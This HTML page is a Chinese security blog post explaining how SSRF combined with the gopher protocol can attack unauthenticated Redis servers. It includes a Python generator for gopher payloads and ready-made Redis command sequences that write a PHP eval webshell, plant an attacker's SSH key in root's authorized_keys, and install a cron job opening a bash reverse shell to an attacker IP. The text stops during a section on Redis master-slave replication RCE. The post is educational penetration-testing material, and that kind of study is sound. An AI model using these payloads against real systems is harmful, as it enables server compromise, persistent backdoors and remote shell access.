<!DOCTYPE html>
<html>
<head><meta name="generator" content="Hexo 3.9.0">
    

    

    



    <meta charset="utf-8">
    
    
    
    
    <title>浅析Redis中SSRF的利用 | 七友 | 路漫漫其修远兮，吾将上下而求索</title>
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    
    <meta name="theme-color" content="#3F51B5">
    
    
    <meta name="keywords" content="Redis,SSRF">
    <meta name="description" content="SSRF介绍SSRF，服务器端请求伪造，服务器请求伪造，是由攻击者构造的漏洞，用于形成服务器发起的请求。通常，SSRF攻击的目标是外部网络无法访问的内部系统。这里我们要介绍的是关于redis中SSRF的利用，如果有什么错误的地方还请师傅们不吝赐教/握拳。 前置知识文章中的数据包构造会涉及到redis的RESP协议，所以我们这里先科普一下，了解RESP协议的师傅可以跳过=。= RESP协议Redis">
<meta name="keywords" content="Redis,SSRF">
<meta property="og:type" content="article">
<meta property="og:title" content="浅析Redis中SSRF的利用">
<meta property="og:url" content="https://byqiyou.github.io/2019/07/15/浅析Redis中SSRF的利用/index.html">
<meta property="og:site_name" content="七友">
<meta property="og:description" content="SSRF介绍SSRF，服务器端请求伪造，服务器请求伪造，是由攻击者构造的漏洞，用于形成服务器发起的请求。通常，SSRF攻击的目标是外部网络无法访问的内部系统。这里我们要介绍的是关于redis中SSRF的利用，如果有什么错误的地方还请师傅们不吝赐教/握拳。 前置知识文章中的数据包构造会涉及到redis的RESP协议，所以我们这里先科普一下，了解RESP协议的师傅可以跳过=。= RESP协议Redis">
<meta property="og:locale" content="zh-CN">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20190713085931-794d2d5e-a509-1.png">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20190713090053-a9d401f0-a509-1.png">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20190713184952-f1bb74e2-a55b-1.png">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20190713184859-d1be7432-a55b-1.png">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20190713185023-04486f84-a55c-1.png">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20190713183658-246f246c-a55a-1.png">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20190713183322-a37e93d8-a559-1.png">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20190713183413-c1a43818-a559-1.png">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20190713183504-e0404db6-a559-1.png">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20190713174818-57eaa354-a553-1.png">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20190713174721-35fd0ebc-a553-1.png">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20190712203930-18130eb2-a4a2-1.png">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20190712235651-a9a794c2-a4bd-1.png">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20190713002514-a0feb180-a4c1-1.png">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20190713004119-dfd75b44-a4c3-1.png">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20190713004651-a59d01da-a4c4-1.png">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20190713005510-cf74b1aa-a4c5-1.png">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20190713014728-1d6e49a0-a4cd-1.png">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20190712154011-4783cdd2-a478-1.png">
<meta property="og:updated_time" content="2019-07-16T06:59:32.821Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="浅析Redis中SSRF的利用">
<meta name="twitter:description" content="SSRF介绍SSRF，服务器端请求伪造，服务器请求伪造，是由攻击者构造的漏洞，用于形成服务器发起的请求。通常，SSRF攻击的目标是外部网络无法访问的内部系统。这里我们要介绍的是关于redis中SSRF的利用，如果有什么错误的地方还请师傅们不吝赐教/握拳。 前置知识文章中的数据包构造会涉及到redis的RESP协议，所以我们这里先科普一下，了解RESP协议的师傅可以跳过=。= RESP协议Redis">
<meta name="twitter:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20190713085931-794d2d5e-a509-1.png">
    
    <link rel="shortcut icon" href="/favicon.ico">
    <link rel="stylesheet" href="//unpkg.com/hexo-theme-material-indigo@latest/css/style.css">
    <script>window.lazyScripts=[]</script>

    <!-- custom head -->
    

<link rel="stylesheet" href="/css/prism-tomorrow.css" type="text/css"></head>

<body>
    <div id="loading" class="active"></div>

    <aside id="menu" class="hide" >
  <div class="inner flex-row-vertical">
    <a href="javascript:;" class="header-icon waves-effect waves-circle waves-light" id="menu-off">
        <i class="icon icon-lg icon-close"></i>
    </a>
    <div class="brand-wrap" style="background-image:url(/img/brand.jpg)">
      <div class="brand">
        <a href="/" class="avatar waves-effect waves-circle waves-light">
          <img src="/img/avatar.jpg">
        </a>
        <hgroup class="introduce">
          <h5 class="nickname">七友</h5>
          <a href="mailto:1920854803@qq.com" title="1920854803@qq.com" class="mail">1920854803@qq.com</a>
        </hgroup>
      </div>
    </div>
    <div class="scroll-wrap flex-col">
      <ul class="nav">
        
            <li class="waves-block waves-effect">
              <a href="/"  >
                <i class="icon icon-lg icon-home"></i>
                主页
              </a>
            </li>
        
            <li class="waves-block waves-effect">
              <a href="/archives"  >
                <i class="icon icon-lg icon-archives"></i>
                Archives
              </a>
            </li>
        
            <li class="waves-block waves-effect">
              <a href="/tags"  >
                <i class="icon icon-lg icon-tags"></i>
                Tags
              </a>
            </li>
        
            <li class="waves-block waves-effect">
              <a href="/categories"  >
                <i class="icon icon-lg icon-th-list"></i>
                Categories
              </a>
            </li>
        
            <li class="waves-block waves-effect">
              <a href="https://github.com/byqiyou" target="_blank" >
                <i class="icon icon-lg icon-github"></i>
                Github
              </a>
            </li>
        
            <li class="waves-block waves-effect">
              <a href="/friends"  >
                <i class="icon icon-lg icon-link"></i>
                测试
              </a>
            </li>
        
      </ul>
    </div>
  </div>
</aside>

    <main id="main">
        <header class="top-header" id="header">
    <div class="flex-row">
        <a href="javascript:;" class="header-icon waves-effect waves-circle waves-light on" id="menu-toggle">
          <i class="icon icon-lg icon-navicon"></i>
        </a>
        <div class="flex-col header-title ellipsis">浅析Redis中SSRF的利用</div>
        
        <div class="search-wrap" id="search-wrap">
            <a href="javascript:;" class="header-icon waves-effect waves-circle waves-light" id="back">
                <i class="icon icon-lg icon-chevron-left"></i>
            </a>
            <input type="text" id="key" class="search-input" autocomplete="off" placeholder="输入感兴趣的关键字">
            <a href="javascript:;" class="header-icon waves-effect waves-circle waves-light" id="search">
                <i class="icon icon-lg icon-search"></i>
            </a>
        </div>
        
        
        <a href="javascript:;" class="header-icon waves-effect waves-circle waves-light" id="menuShare">
            <i class="icon icon-lg icon-share-alt"></i>
        </a>
        
    </div>
</header>
<header class="content-header post-header">

    <div class="container fade-scale">
        <h1 class="title">浅析Redis中SSRF的利用</h1>
        <h5 class="subtitle">
            
                <time datetime="2019-07-15T13:43:42.000Z" itemprop="datePublished" class="page-time">
  2019-07-15
</time>


            
        </h5>
    </div>

    


</header>


<div class="container body-wrap">
    
    <aside class="post-widget">
        <nav class="post-toc-wrap post-toc-shrink" id="post-toc">
            <h4>TOC</h4>
            <ol class="post-toc"><li class="post-toc-item post-toc-level-1"><a class="post-toc-link" href="#SSRF介绍"><span class="post-toc-number">1.</span> <span class="post-toc-text">SSRF介绍</span></a></li><li class="post-toc-item post-toc-level-1"><a class="post-toc-link" href="#前置知识"><span class="post-toc-number">2.</span> <span class="post-toc-text">前置知识</span></a><ol class="post-toc-child"><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#RESP协议"><span class="post-toc-number">2.1.</span> <span class="post-toc-text">RESP协议</span></a></li></ol></li><li class="post-toc-item post-toc-level-1"><a class="post-toc-link" href="#Redis配合gopher协议进行SSRF"><span class="post-toc-number">3.</span> <span class="post-toc-text">Redis配合gopher协议进行SSRF</span></a><ol class="post-toc-child"><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#概述"><span class="post-toc-number">3.1.</span> <span class="post-toc-text">概述</span></a></li><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#利用条件"><span class="post-toc-number">3.2.</span> <span class="post-toc-text">利用条件</span></a></li><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#利用"><span class="post-toc-number">3.3.</span> <span class="post-toc-text">利用</span></a></li><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#绝对路径写webshell"><span class="post-toc-number">3.4.</span> <span class="post-toc-text">绝对路径写webshell</span></a><ol class="post-toc-child"><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#构造payload"><span class="post-toc-number">3.4.1.</span> <span class="post-toc-text">构造payload</span></a></li></ol></li><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#写ssh公钥"><span class="post-toc-number">3.5.</span> <span class="post-toc-text">写ssh公钥</span></a><ol class="post-toc-child"><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#构造payload-1"><span class="post-toc-number">3.5.1.</span> <span class="post-toc-text">构造payload</span></a></li></ol></li><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#利用contrab计划任务反弹shell"><span class="post-toc-number">3.6.</span> <span class="post-toc-text">利用contrab计划任务反弹shell</span></a><ol class="post-toc-child"><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#构造payload-2"><span class="post-toc-number">3.6.1.</span> <span class="post-toc-text">构造payload</span></a></li></ol></li></ol></li><li class="post-toc-item post-toc-level-1"><a class="post-toc-link" href="#Redis4-x-5-x从SSRF到RCE"><span class="post-toc-number">4.</span> <span class="post-toc-text">Redis4.x/5.x从SSRF到RCE</span></a><ol class="post-toc-child"><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#前言"><span class="post-toc-number">4.1.</span> <span class="post-toc-text">前言</span></a></li><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#介绍"><span class="post-toc-number">4.2.</span> <span class="post-toc-text">介绍</span></a></li><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#利用-1"><span class="post-toc-number">4.3.</span> <span class="post-toc-text">利用</span></a><ol class="post-toc-child"><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#主从复制"><span class="post-toc-number">4.3.1.</span> <span class="post-toc-text">主从复制</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#redis-module"><span class="post-toc-number">4.3.2.</span> <span class="post-toc-text">redis module</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#利用原理"><span class="post-toc-number">4.3.3.</span> <span class="post-toc-text">利用原理</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#攻击流程"><span class="post-toc-number">4.3.4.</span> <span class="post-toc-text">攻击流程</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#exp"><span class="post-toc-number">4.3.5.</span> <span class="post-toc-text">exp</span></a></li></ol></li></ol></li><li class="post-toc-item post-toc-level-1"><a class="post-toc-link" href="#Reference"><span class="post-toc-number">5.</span> <span class="post-toc-text">Reference</span></a></li></ol>
        </nav>
    </aside>


<article id="post-浅析Redis中SSRF的利用"
  class="post-article article-type-post fade" itemprop="blogPost">

    <div class="post-card">
        <h1 class="post-card-title">浅析Redis中SSRF的利用</h1>
        <div class="post-meta">
            <time class="post-time" title="2019-07-15 21:43:42" datetime="2019-07-15T13:43:42.000Z"  itemprop="datePublished">2019-07-15</time>

            


            
<span id="busuanzi_container_page_pv" title="文章总阅读量" style='display:none'>
    <i class="icon icon-eye icon-pr"></i><span id="busuanzi_value_page_pv"></span>
</span>


        </div>
        <div class="post-content" id="post-content" itemprop="postContent">
            <h1 id="SSRF介绍"><a href="#SSRF介绍" class="headerlink" title="SSRF介绍"></a>SSRF介绍</h1><p>SSRF，服务器端请求伪造，服务器请求伪造，是由攻击者构造的漏洞，用于形成服务器发起的请求。通常，SSRF攻击的目标是外部网络无法访问的内部系统。这里我们要介绍的是关于<code>redis</code>中SSRF的利用，如果有什么错误的地方还请师傅们不吝赐教/握拳。</p>
<h1 id="前置知识"><a href="#前置知识" class="headerlink" title="前置知识"></a>前置知识</h1><p>文章中的数据包构造会涉及到redis的<code>RESP</code>协议，所以我们这里先科普一下，了解RESP协议的师傅可以跳过=。=</p>
<h2 id="RESP协议"><a href="#RESP协议" class="headerlink" title="RESP协议"></a>RESP协议</h2><p><code>Redis</code>服务器与客户端通过<code>RESP</code>（REdis Serialization Protocol）协议通信。<br>RESP协议是在Redis 1.2中引入的，但它成为了与Redis 2.0中的Redis服务器通信的标准方式。这是您应该在Redis客户端中实现的协议。<br>RESP实际上是一个支持以下数据类型的序列化协议：简单字符串，错误，整数，批量字符串和数组。</p>
<p>RESP在Redis中用作请求 - 响应协议的方式如下：</p>
<ol>
<li>客户端将命令作为<code>Bulk Strings</code>的RESP数组发送到Redis服务器。</li>
<li>服务器根据命令实现回复一种RESP类型。</li>
</ol>
<p>在RESP中，某些数据的类型取决于第一个字节：<br>对于<code>Simple Strings</code>，回复的第一个字节是<code>+</code><br>对于<code>error</code>，回复的第一个字节是<code>-</code><br>对于<code>Integer</code>，回复的第一个字节是<code>:</code><br>对于<code>Bulk Strings</code>，回复的第一个字节是<code>$</code><br>对于<code>array</code>，回复的第一个字节是<code>*</code><br>此外，<code>RESP</code>能够使用稍后指定的<code>Bulk Strings</code>或<code>Array</code>的特殊变体来表示<code>Null</code>值。<br>在RESP中，协议的不同部分始终以<code>"\r\n"(CRLF)</code>结束。</p>
<p>我们用<code>tcpdump</code>来抓个包来测试一下</p>
<pre><code>tcpdump port 6379 -w ./Desktop/1.pcap
</code></pre><p>redis客户端中执行如下命令</p>
<pre class=" language-sh"><code class="language-sh">192.168.163.128:6379> set name test
OK
192.168.163.128:6379> get name
"test"
192.168.163.128:6379>

</code></pre>
<p>抓到的数据包如下</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://xzfile.aliyuncs.com/media/upload/picture/20190713085931-794d2d5e-a509-1.png" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>
<p>hex转储看一下</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://xzfile.aliyuncs.com/media/upload/picture/20190713090053-a9d401f0-a509-1.png" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>
<p>正如我们前面所说的，客户端向将命令作为<code>Bulk Strings</code>的RESP数组发送到Redis服务器，然后服务器根据命令实现回复给客户端一种RESP类型。<br>我们就拿上面的数据包分析，首先是<code>*3</code>，代表数组的长度为3（可以简单理解为用空格为分隔符将命令分割为[“set”,”name”,”test”]）；<code>$4</code>代表字符串的长度，<code>0d0a</code>即<code>\r\n</code>表示结束符；<code>+OK</code>表示服务端执行成功后返回的字符串</p>
<h1 id="Redis配合gopher协议进行SSRF"><a href="#Redis配合gopher协议进行SSRF" class="headerlink" title="Redis配合gopher协议进行SSRF"></a>Redis配合gopher协议进行SSRF</h1><h2 id="概述"><a href="#概述" class="headerlink" title="概述"></a>概述</h2><p><code>Gopher</code> 协议是 HTTP 协议出现之前，在 Internet 上常见且常用的一个协议，不过现在gopher协议用得已经越来越少了<br><code>Gopher</code> 协议可以说是SSRF中的万金油，。利用此协议可以攻击内网的 redis、ftp等等，也可以发送 GET、POST 请求。这无疑极大拓宽了 SSRF 的攻击面。</p>
<h2 id="利用条件"><a href="#利用条件" class="headerlink" title="利用条件"></a>利用条件</h2><pre><code>能未授权或者能通过弱口令认证访问到Redis服务器
</code></pre><h2 id="利用"><a href="#利用" class="headerlink" title="利用"></a>利用</h2><p>redis常见的SSRF攻击方式大概有这几种：</p>
<ol>
<li><p>绝对路径写webshell</p>
</li>
<li><p>写ssh公钥</p>
</li>
<li><p>写contrab计划任务反弹shell</p>
</li>
</ol>
<p>下面我们逐个实现</p>
<h2 id="绝对路径写webshell"><a href="#绝对路径写webshell" class="headerlink" title="绝对路径写webshell"></a>绝对路径写webshell</h2><p>这个方法比较常用，也是用得最多的=。=</p>
<h3 id="构造payload"><a href="#构造payload" class="headerlink" title="构造payload"></a>构造payload</h3><p>构造redis命令</p>
<pre><code>flushall
set 1 '&lt;?php eval($_GET["cmd"]);?&gt;'
config set dir /var/www/html
config set dbfilename shell.php
save
</code></pre><p>写了一个简单的脚本，转化为redis RESP协议的格式</p>
<pre class=" language-python"><code class="language-python"><span class="token keyword">import</span> urllib
protocol<span class="token operator">=</span><span class="token string">"gopher://"</span>
ip<span class="token operator">=</span><span class="token string">"192.168.163.128"</span>
port<span class="token operator">=</span><span class="token string">"6379"</span>
shell<span class="token operator">=</span><span class="token string">"\n\n&lt;?php eval($_GET[\"cmd\"]);?>\n\n"</span>
filename<span class="token operator">=</span><span class="token string">"shell.php"</span>
path<span class="token operator">=</span><span class="token string">"/var/www/html"</span>
passwd<span class="token operator">=</span><span class="token string">""</span>
cmd<span class="token operator">=</span><span class="token punctuation">[</span><span class="token string">"flushall"</span><span class="token punctuation">,</span>
     <span class="token string">"set 1 {}"</span><span class="token punctuation">.</span>format<span class="token punctuation">(</span>shell<span class="token punctuation">.</span>replace<span class="token punctuation">(</span><span class="token string">" "</span><span class="token punctuation">,</span><span class="token string">"${IFS}"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">,</span>
     <span class="token string">"config set dir {}"</span><span class="token punctuation">.</span>format<span class="token punctuation">(</span>path<span class="token punctuation">)</span><span class="token punctuation">,</span>
     <span class="token string">"config set dbfilename {}"</span><span class="token punctuation">.</span>format<span class="token punctuation">(</span>filename<span class="token punctuation">)</span><span class="token punctuation">,</span>
     <span class="token string">"save"</span>
     <span class="token punctuation">]</span>
<span class="token keyword">if</span> passwd<span class="token punctuation">:</span>
    cmd<span class="token punctuation">.</span>insert<span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">,</span><span class="token string">"AUTH {}"</span><span class="token punctuation">.</span>format<span class="token punctuation">(</span>passwd<span class="token punctuation">)</span><span class="token punctuation">)</span>
payload<span class="token operator">=</span>protocol<span class="token operator">+</span>ip<span class="token operator">+</span><span class="token string">":"</span><span class="token operator">+</span>port<span class="token operator">+</span><span class="token string">"/_"</span>
<span class="token keyword">def</span> <span class="token function">redis_format</span><span class="token punctuation">(</span>arr<span class="token punctuation">)</span><span class="token punctuation">:</span>
    CRLF<span class="token operator">=</span><span class="token string">"\r\n"</span>
    redis_arr <span class="token operator">=</span> arr<span class="token punctuation">.</span>split<span class="token punctuation">(</span><span class="token string">" "</span><span class="token punctuation">)</span>
    cmd<span class="token operator">=</span><span class="token string">""</span>
    cmd<span class="token operator">+=</span><span class="token string">"*"</span><span class="token operator">+</span>str<span class="token punctuation">(</span>len<span class="token punctuation">(</span>redis_arr<span class="token punctuation">)</span><span class="token punctuation">)</span>
    <span class="token keyword">for</span> x <span class="token keyword">in</span> redis_arr<span class="token punctuation">:</span>
        cmd<span class="token operator">+=</span>CRLF<span class="token operator">+</span><span class="token string">"$"</span><span class="token operator">+</span>str<span class="token punctuation">(</span>len<span class="token punctuation">(</span><span class="token punctuation">(</span>x<span class="token punctuation">.</span>replace<span class="token punctuation">(</span><span class="token string">"${IFS}"</span><span class="token punctuation">,</span><span class="token string">" "</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token operator">+</span>CRLF<span class="token operator">+</span>x<span class="token punctuation">.</span>replace<span class="token punctuation">(</span><span class="token string">"${IFS}"</span><span class="token punctuation">,</span><span class="token string">" "</span><span class="token punctuation">)</span>
    cmd<span class="token operator">+=</span>CRLF
    <span class="token keyword">return</span> cmd

<span class="token keyword">if</span> __name__<span class="token operator">==</span><span class="token string">"__main__"</span><span class="token punctuation">:</span>
    <span class="token keyword">for</span> x <span class="token keyword">in</span> cmd<span class="token punctuation">:</span>
        payload <span class="token operator">+=</span> urllib<span class="token punctuation">.</span>quote<span class="token punctuation">(</span>redis_format<span class="token punctuation">(</span>x<span class="token punctuation">)</span><span class="token punctuation">)</span>
    <span class="token keyword">print</span> payload
</code></pre>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://xzfile.aliyuncs.com/media/upload/picture/20190713184952-f1bb74e2-a55b-1.png" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>
<p>生成payload后，用<code>curl</code>打一波</p>
<p><img src="https://xzfile.aliyuncs.com/media/upload/picture/20190713184859-d1be7432-a55b-1.png" alt="image.png"></p>
<p>执行成功，我们看一波shell是否写入成功</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://xzfile.aliyuncs.com/media/upload/picture/20190713185023-04486f84-a55c-1.png" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>
<p>成功写入</p>
<h2 id="写ssh公钥"><a href="#写ssh公钥" class="headerlink" title="写ssh公钥"></a>写ssh公钥</h2><p>如果<code>.ssh</code>目录存在，则直接写入<code>~/.ssh/authorized_keys</code><br>如果不存在，则可以利用<code>crontab</code>创建该目录</p>
<h3 id="构造payload-1"><a href="#构造payload-1" class="headerlink" title="构造payload"></a>构造payload</h3><p>构造redis命令</p>
<pre><code>flushall
set 1 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDGd9qrfBQqsml+aGC/PoXsKGFhW3sucZ81fiESpJ+HSk1ILv+mhmU2QNcopiPiTu+kGqJYjIanrQEFbtL+NiWaAHahSO3cgPYXpQ+lW0FQwStEHyDzYOM3Jq6VMy8PSPqkoIBWc7Gsu6541NhdltPGH202M7PfA6fXyPR/BSq30ixoAT1vKKYMp8+8/eyeJzDSr0iSplzhKPkQBYquoiyIs70CTp7HjNwsE2lKf4WV8XpJm7DHSnnnu+1kqJMw0F/3NqhrxYK8KpPzpfQNpkAhKCozhOwH2OdNuypyrXPf3px06utkTp6jvx3ESRfJ89jmuM9y4WozM3dylOwMWjal root@kali
'
config set dir /root/.ssh/
config set dbfilename authorized_keys
save
</code></pre><p>转化为redis RESP协议的格式<br><strong>PS：将第一个脚本改一下</strong></p>
<pre class=" language-python"><code class="language-python">filename<span class="token operator">=</span><span class="token string">"authorized_keys"</span>
ssh_pub<span class="token operator">=</span><span class="token string">"\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDGd9qrfBQqsml+aGC/PoXsKGFhW3sucZ81fiESpJ+HSk1ILv+mhmU2QNcopiPiTu+kGqJYjIanrQEFbtL+NiWaAHahSO3cgPYXpQ+lW0FQwStEHyDzYOM3Jq6VMy8PSPqkoIBWc7Gsu6541NhdltPGH202M7PfA6fXyPR/BSq30ixoAT1vKKYMp8+8/eyeJzDSr0iSplzhKPkQBYquoiyIs70CTp7HjNwsE2lKf4WV8XpJm7DHSnnnu+1kqJMw0F/3NqhrxYK8KpPzpfQNpkAhKCozhOwH2OdNuypyrXPf3px06utkTp6jvx3ESRfJ89jmuM9y4WozM3dylOwMWjal root@kali\n\n"</span>
path<span class="token operator">=</span><span class="token string">"/root/.ssh/"</span>
</code></pre>
<p>生成payload<br></p><figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://xzfile.aliyuncs.com/media/upload/picture/20190713183658-246f246c-a55a-1.png" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure><br><code>curl</code>打一波<br><figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://xzfile.aliyuncs.com/media/upload/picture/20190713183322-a37e93d8-a559-1.png" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure><br>我们来查看一波是否成功写入<p></p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://xzfile.aliyuncs.com/media/upload/picture/20190713183413-c1a43818-a559-1.png" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>
<p>成功写入，尝试连接</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://xzfile.aliyuncs.com/media/upload/picture/20190713183504-e0404db6-a559-1.png" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>
<p>成功连接</p>
<h2 id="利用contrab计划任务反弹shell"><a href="#利用contrab计划任务反弹shell" class="headerlink" title="利用contrab计划任务反弹shell"></a>利用contrab计划任务反弹shell</h2><p>这个方法只能<code>Centos</code>上使用，<code>Ubuntu上行不通</code>，原因如下：</p>
<ol>
<li><p>因为默认redis写文件后是644的权限，但ubuntu要求执行定时任务文件<code>/var/spool/cron/crontabs/&lt;username&gt;</code>权限必须是600也就是<code>-rw-------</code>才会执行，否则会报错<code>(root) INSECURE MODE (mode 0600 expected)</code>，而Centos的定时任务文件<code>/var/spool/cron/&lt;username&gt;</code>权限644也能执行</p>
</li>
<li><p>因为redis保存RDB会存在乱码，在Ubuntu上会报错，而在Centos上不会报错</p>
</li>
</ol>
<p>由于系统的不同，crontrab定时文件位置也会不同<br>Centos的定时任务文件在<code>/var/spool/cron/&lt;username&gt;</code><br>Ubuntu定时任务文件在<code>/var/spool/cron/crontabs/&lt;username&gt;</code><br>Centos和Ubuntu均存在的（需要root权限）<code>/etc/crontab</code> PS：高版本的redis默认启动是<code>redis</code>权限，故写这个文件是行不通的</p>
<h3 id="构造payload-2"><a href="#构造payload-2" class="headerlink" title="构造payload"></a>构造payload</h3><p>构造redis的命令如下：</p>
<pre><code>flushall
set 1 '\n\n*/1 * * * * bash -i &gt;&amp; /dev/tcp/192.168.163.132/2333 0&gt;&amp;1\n\n'
config set dir /var/spool/cron/
config set dbfilename root
save
</code></pre><p>转化为redis RESP协议的格式<br><strong>PS：将第一个脚本改一下</strong></p>
<pre class=" language-python"><code class="language-python">reverse_ip<span class="token operator">=</span><span class="token string">"192.168.163.132"</span>
reverse_port<span class="token operator">=</span><span class="token string">"2333"</span>
cron<span class="token operator">=</span><span class="token string">"\n\n\n\n*/1 * * * * bash -i >&amp; /dev/tcp/%s/%s 0>&amp;1\n\n\n\n"</span><span class="token operator">%</span><span class="token punctuation">(</span>reverse_ip<span class="token punctuation">,</span>reverse_port<span class="token punctuation">)</span>
filename<span class="token operator">=</span><span class="token string">"root"</span>
path<span class="token operator">=</span><span class="token string">"/var/spool/cron"</span>
</code></pre>
<p>生成一波，尝试反弹shell<br></p><figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://xzfile.aliyuncs.com/media/upload/picture/20190713174818-57eaa354-a553-1.png" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure><p></p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://xzfile.aliyuncs.com/media/upload/picture/20190713174721-35fd0ebc-a553-1.png" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>
<p>成功反弹shell</p>
<h1 id="Redis4-x-5-x从SSRF到RCE"><a href="#Redis4-x-5-x从SSRF到RCE" class="headerlink" title="Redis4.x/5.x从SSRF到RCE"></a>Redis4.x/5.x从SSRF到RCE</h1><h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>前几天看到RR师傅在朋友圈发的redis4.x/5.x rce，原本想去搞搞看的，但是无奈本菜鸡正处于考试预习阶段QAQ，所以没什么心思去看 =。=，直到考完试才安心下来看，不过网上已经很多关于redis rce分析的文章，但是我发现大多数都是一笔带过没怎么看懂（我理解能力比较差），所以决定自己搞一下。</p>
<h2 id="介绍"><a href="#介绍" class="headerlink" title="介绍"></a>介绍</h2><p>redis 4.x/5.x RCE是由<code>LC/BC</code>战队队员<code>Pavel Toporkov</code>在<code>zeronights 2018</code>上提出的基于主从复制的redis rce，演讲的PPT地址为：<a href="https://2018.zeronights.ru/wp-content/uploads/materials/15-redis-post-exploitation.pdf" target="_blank" rel="noopener">PPT</a></p>
<h2 id="利用-1"><a href="#利用-1" class="headerlink" title="利用"></a>利用</h2><p>利用条件：</p>
<ul>
<li>能未授权或者能通过弱口令认证访问到Redis服务器</li>
</ul>
<h3 id="主从复制"><a href="#主从复制" class="headerlink" title="主从复制"></a>主从复制</h3><p>主从复制的概述：</p>
<pre><code>主从复制，是指将一台Redis服务器的数据，复制到其他的Redis服务器。前者称为主节点(master)，后者称为从节点(slave)；数据的复制是单向的，只能由主节点到从节点。
redis的持久化使得机器即使重启数据也不会丢失，因为redis服务器重启后会把硬盘上的文件重新恢复到内存中，但是如果硬盘的数据被删除的话数据就无法恢复了，如果通过主从复制就能解决这个问题，主redis的数据和从redis上的数据保持实时同步，当主redis写入数据是就会通过主从复制复制到其它从redis。
</code></pre><figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://xzfile.aliyuncs.com/media/upload/picture/20190712203930-18130eb2-a4a2-1.png" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>
<p>建立主从复制，有3种方式：</p>
<ol>
<li>配置文件写入<code>slaveof &lt;master_ip&gt; &lt;master_port&gt;</code></li>
<li>redis-server启动命令后加入 <code>--slaveof &lt;master_ip&gt; &lt;master_port&gt;</code></li>
<li>连接到客户端之后执行：slaveof <code>&lt;master_ip&gt; &lt;master_port&gt;</code></li>
</ol>
<p><strong>PS：建立主从关系只需要在从节点操作就行了，主节点不用任何操作</strong></p>
